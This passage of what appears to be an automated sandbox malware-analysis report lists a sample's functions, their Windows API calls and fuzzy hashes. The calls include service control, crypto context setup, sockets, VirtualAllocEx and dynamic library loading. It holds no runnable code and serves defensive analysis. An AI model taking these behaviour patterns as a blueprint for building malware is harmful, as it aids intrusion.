                                                                • RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 004B6A34
                                                                • RtlMoveMemory.NTDLL(00000000,?,00000004), ref: 004B6A74
                                                                • RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 004B6B5A
                                                                • RtlMoveMemory.NTDLL(00000000,?,00000004), ref: 004B6B9A
                                                                • RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 004B6C80
                                                                • RtlMoveMemory.NTDLL(00000000,?,00000004), ref: 004B6CC0
                                                                • RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 004B6DA6
                                                                • RtlMoveMemory.NTDLL(00000000,?,00000004), ref: 004B6DE6
                                                                • RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 004B6ECC
                                                                • RtlMoveMemory.NTDLL(00000000,?,00000004), ref: 004B6F0C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MemoryMove$lstrlen
                                                                • String ID: "$\
                                                                • API String ID: 3143474183-1472051173
                                                                • Opcode ID: c5af64b26b2291506de865b9503f136e2cd275813bc9c25ea2ea9152010738b9
                                                                • Instruction ID: 5f332537a11c89a699be5e722cc7ad0cc1a02a3468edbf2174cd1c10692aaaba
                                                                • Opcode Fuzzy Hash: c5af64b26b2291506de865b9503f136e2cd275813bc9c25ea2ea9152010738b9
                                                                • Instruction Fuzzy Hash: 72420870D0461CEBDF00AF92E889AEEBF74FF48314F16145AE04176195CB794975CB2A
                                                                Function 00426AD7 Relevance: 25.9, APIs: 17, Instructions: 446serviceCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,?), ref: 00426B7F
                                                                • OpenServiceA.ADVAPI32(00000000,00000000,?), ref: 00426C4B
                                                                • ControlService.ADVAPI32(00000000,00000004,00426584), ref: 00426C8C
                                                                • ControlService.ADVAPI32(00000000,00000001,00426584), ref: 00426CE2
                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00426D1B
                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00426D47
                                                                • ControlService.ADVAPI32(00000000,00000004,00426584,00000000), ref: 00426D9C
                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00426DD5
                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00426E01
                                                                • CloseServiceHandle.ADVAPI32(00000000,00000000), ref: 00426E94
                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00426EC0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Service$CloseHandle$Control$Open$Manager
                                                                • String ID:
                                                                • API String ID: 1876490491-0
                                                                • Opcode ID: 1755296f8fc54cf54e599685dc0260275dc26e8e0e1ccef6e1c89ba21033de50
                                                                • Instruction ID: cb4cfcf12ec3748afaf6fe6fe20870313ae5e7475056768f32ffedc90ed4faed
                                                                • Opcode Fuzzy Hash: 1755296f8fc54cf54e599685dc0260275dc26e8e0e1ccef6e1c89ba21033de50
                                                                • Instruction Fuzzy Hash: CCE15E70F81319BBEB109F81ED87BBEB631EB06711F601066F7043E1D1D6B65A508A9E
                                                                Function 00426519 Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d1a4f1cca5669f914b4b9a93ac4b89997ffeab7cba7c63631a9e07527697da6b
                                                                • Instruction ID: fc4168784fd8f757b4b04a549f650068bb1707f5b9fe4a3474148942801cb55f
                                                                • Opcode Fuzzy Hash: d1a4f1cca5669f914b4b9a93ac4b89997ffeab7cba7c63631a9e07527697da6b
                                                                • Instruction Fuzzy Hash: BED19E70F41315BBEB109F81ED43BBEB631EB06715F601026F6053E2D1D6BA5A508BAE
                                                                Function 004145B5 Relevance: 23.3, APIs: 12, Strings: 1, Instructions: 590encryptionCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CryptAcquireContextA.ADVAPI32(00000000,004EE2EC,004EE2EC,00000001,F0000000), ref: 00414626
                                                                • CryptAcquireContextA.ADVAPI32(00000000,004EE2EC,004EE2EC,00000001,00000000), ref: 00414674
                                                                • CryptCreateHash.ADVAPI32(00000000,00000000,00000000,00000000,00000000), ref: 004146C6
                                                                • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00414704
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Crypt$Context$Acquire$CreateHashRelease
                                                                • String ID: 0123456789ABCDEF
                                                                • API String ID: 3535039526-2554083253
                                                                • Opcode ID: f9eac58559a44d84fa9b87f84b6a0f7e67f6b8d043bd9254509847c5fd200987
                                                                • Instruction ID: 891ec6b27578ed4031a72fea8fe2fd55bdf83367041d31bd596637aefe0faade
                                                                • Opcode Fuzzy Hash: f9eac58559a44d84fa9b87f84b6a0f7e67f6b8d043bd9254509847c5fd200987
                                                                • Instruction Fuzzy Hash: DD128FB0E40358BBDB00AF91EC83BEEBB74BB55714F14002AF6087A292D77959548B9D
                                                                Function 0046AA2F Relevance: 20.1, APIs: 5, Strings: 5, Instructions: 2627networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • WSAStartup.WS2_32(00000202,00000000), ref: 0046AC59
                                                                  • Part of subcall function 004CC470: PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 004CC48A
                                                                  • Part of subcall function 004CC470: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004CC4B4
                                                                  • Part of subcall function 004CC470: TranslateMessage.USER32(?), ref: 004CC4BB
                                                                  • Part of subcall function 004CC470: DispatchMessageA.USER32(?), ref: 004CC4C2
                                                                  • Part of subcall function 004CC470: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 004CC4D1
                                                                • htons.WS2_32(00000000), ref: 0046C053
                                                                • htons.WS2_32(00000000), ref: 0046C506
                                                                • CloseHandle.KERNEL32(00000000,00000000,?,00001000,00000000,00000000,FFFFFFFF,00000000,00000000,00000000,00000000), ref: 0046C75E
                                                                • WSACleanup.WS2_32 ref: 0046E0AE
                                                                  • Part of subcall function 00442748: FindWindowA.USER32(ENewFrame,00000000), ref: 0044276C
                                                                  • Part of subcall function 00442748: GetDlgItem.USER32(?,0000E81E), ref: 004427A0
                                                                  • Part of subcall function 00442748: GetDlgItem.USER32(00000000,00000082), ref: 004427D4
                                                                  • Part of subcall function 00442748: GetDlgItem.USER32(00000000,00000000), ref: 00442808
                                                                  • Part of subcall function 00442748: GetDlgItem.USER32(00000000,000003E8), ref: 0044283C
                                                                  • Part of subcall function 00442748: GetDlgItem.USER32(00000000,000003F3), ref: 00442870
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ItemMessage$Peekhtons$CleanupCloseDispatchFindHandleStartupTranslateWindow
                                                                • String ID: File$getpeername$getsockname$getsockopt$ws2_32.dll
                                                                • API String ID: 3342885501-4256197169
                                                                • Opcode ID: 4e444177535f8eda41ff0d8c0406f3ccc8da823b798cb90c7ae1dd81d3374b03
                                                                • Instruction ID: 187566758ff3a2b99a99f1babb5daabd8b03c1dec10149d3d3974b50723ab665
                                                                • Opcode Fuzzy Hash: 4e444177535f8eda41ff0d8c0406f3ccc8da823b798cb90c7ae1dd81d3374b03
                                                                • Instruction Fuzzy Hash: E40382B5F40304ABEB00DBA5DCC6B9D77B4EB18304F14003AE609EB396E6B95E54CB56
                                                                Function 0046C7BF Relevance: 19.6, APIs: 5, Strings: 5, Instructions: 2066networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • DuplicateHandle.KERNEL32(?,?,FFFFFFFF,?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0046CD94
                                                                • htons.WS2_32(00000000), ref: 0046D96F
                                                                • htons.WS2_32(00000000), ref: 0046DE22
                                                                • CloseHandle.KERNEL32(?,?,?,00001000), ref: 0046E07A
                                                                • WSACleanup.WS2_32 ref: 0046E0AE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Handlehtons$CleanupCloseDuplicate
                                                                • String ID: %$getpeername$getsockname$getsockopt$ws2_32.dll
                                                                • API String ID: 2810787018-689003843
                                                                • Opcode ID: 9ebc400ad9e445c90332a2ce6a3fc7ff7e044dc692d7ad1d83d7606a8b8c5d5f
                                                                • Instruction ID: 5d3d9513ca2c89cd0735b70983276887c772057f47328f280fc7ec6634647cb3
                                                                • Opcode Fuzzy Hash: 9ebc400ad9e445c90332a2ce6a3fc7ff7e044dc692d7ad1d83d7606a8b8c5d5f
                                                                • Instruction Fuzzy Hash: 2AE26CB5F40308ABDB00DBD5DCC6F9DB7B0EB18305F54002AE209EB296E6B95E45CB16
                                                                Function 0048A725 Relevance: 18.3, APIs: 2, Strings: 10, Instructions: 261COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CoInitialize.OLE32(00000000), ref: 0048A790
                                                                  • Part of subcall function 004CDCB0: VariantClear.OLEAUT32(00000000), ref: 004CDD69
                                                                • CoUninitialize.COMBASE ref: 0048AA12
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ClearInitializeUninitializeVariant
                                                                • String ID: Adodb.Stream$Charset$Close$Mode$Open$Position$ReadText$Type$Write$unicode
                                                                • API String ID: 2180264264-1776227048
                                                                • Opcode ID: b4f3e9f14be26f178d51719b3682ed596969d0e67cb4d75c284ed9108951934e
                                                                • Instruction ID: 375b91bc34b8ac8173ad104b9d8f620858f81b1e6eba6ff862035bac32b34cfc
                                                                • Opcode Fuzzy Hash: b4f3e9f14be26f178d51719b3682ed596969d0e67cb4d75c284ed9108951934e
                                                                • Instruction Fuzzy Hash: DC8184B5FC03047BFB65AA918C97F9D7665A718B04F200029FB047E2C2E6F56A50C75E
                                                                Function 0044C5BF Relevance: 16.6, APIs: 2, Strings: 5, Instructions: 4343filememoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 0044C80A
                                                                • VirtualAllocEx.KERNEL32(FFFFFFFF,00000000,00000000,?,00000040,00001000,00002000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044C962
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocCopyFileVirtual
                                                                • String ID: Z$gdi32.dll$ntdll.dll$user32.dll$w
                                                                • API String ID: 3677450340-2712310420
                                                                • Opcode ID: ed3d05729d53902743e5085e851c36b0df867fbc1e49c5c1751a8430c5e9450c
                                                                • Instruction ID: 295ba64ebb2a8ddbfe9c63ff85f8e482733e26e3ceef9124551968dff7fe0d33
                                                                • Opcode Fuzzy Hash: ed3d05729d53902743e5085e851c36b0df867fbc1e49c5c1751a8430c5e9450c
                                                                • Instruction Fuzzy Hash: 1D63D4B1F40215ABFB14DBA5DC86B9EB7B5FB08314F24002AF604FB391E6B99D058B15
                                                                Function 004DA1DF Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 50libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,004D3E80,?,Microsoft Visual C++ Runtime Library,00012010,?,004E7CEC,?,004E7D3C,?,?,?,Runtime Error!Program: ), ref: 004DA1F1
                                                                • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 004DA209
                                                                • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 004DA21A
                                                                • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 004DA227
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressProc$LibraryLoad
                                                                • String ID: <}N$GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                • API String ID: 2238633743-3177214689
                                                                • Opcode ID: ee20033987df0984e7fd70fdd3dd5ea90822f9bd7efdd1556f60eb8e781ef18c
                                                                • Instruction ID: be1df7db0b5c09006bfc2b525cece0a050a13f6111ebc6972abd9f1f436f228b
                                                                • Opcode Fuzzy Hash: ee20033987df0984e7fd70fdd3dd5ea90822f9bd7efdd1556f60eb8e781ef18c
                                                                • Instruction Fuzzy Hash: 5701D831605702AB8B10DFB66D90F1B3AD9DF59750304046BB506C2321DAB99928DF65
                                                                Function 00442748 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 175stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FindWindowA.USER32(ENewFrame,00000000), ref: 0044276C
                                                                • GetDlgItem.USER32(?,0000E81E), ref: 004427A0
                                                                • GetDlgItem.USER32(00000000,00000082), ref: 004427D4
                                                                • GetDlgItem.USER32(00000000,00000000), ref: 00442808
                                                                • GetDlgItem.USER32(00000000,000003E8), ref: 0044283C
                                                                • GetDlgItem.USER32(00000000,000003F3), ref: 00442870
                                                                • lstrcpyn.KERNEL32(00000000,00000000,00000000), ref: 00442922
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Item$FindWindowlstrcpyn
                                                                • String ID: ENewFrame
                                                                • API String ID: 2863136210-866728150
                                                                • Opcode ID: 98b19f5f67185aa5e039c11d00c1fadf1750bd8dca874c8b760ceda224ea17ec
                                                                • Instruction ID: d378e6205c07dc1453a05f635d3d79dd5f2909cbaf826f61310f6bdcdd57a539
                                                                • Opcode Fuzzy Hash: 98b19f5f67185aa5e039c11d00c1fadf1750bd8dca874c8b760ceda224ea17ec
                                                                • Instruction Fuzzy Hash: 93515F74E80305BBEB00AF91DD4BB6DBB70AB06721F40906AF1083A1D1D7B54B508F9E
                                                                Function 004C0202 Relevance: 14.2, APIs: 5, Strings: 2, Instructions: 1918COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 004C036A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
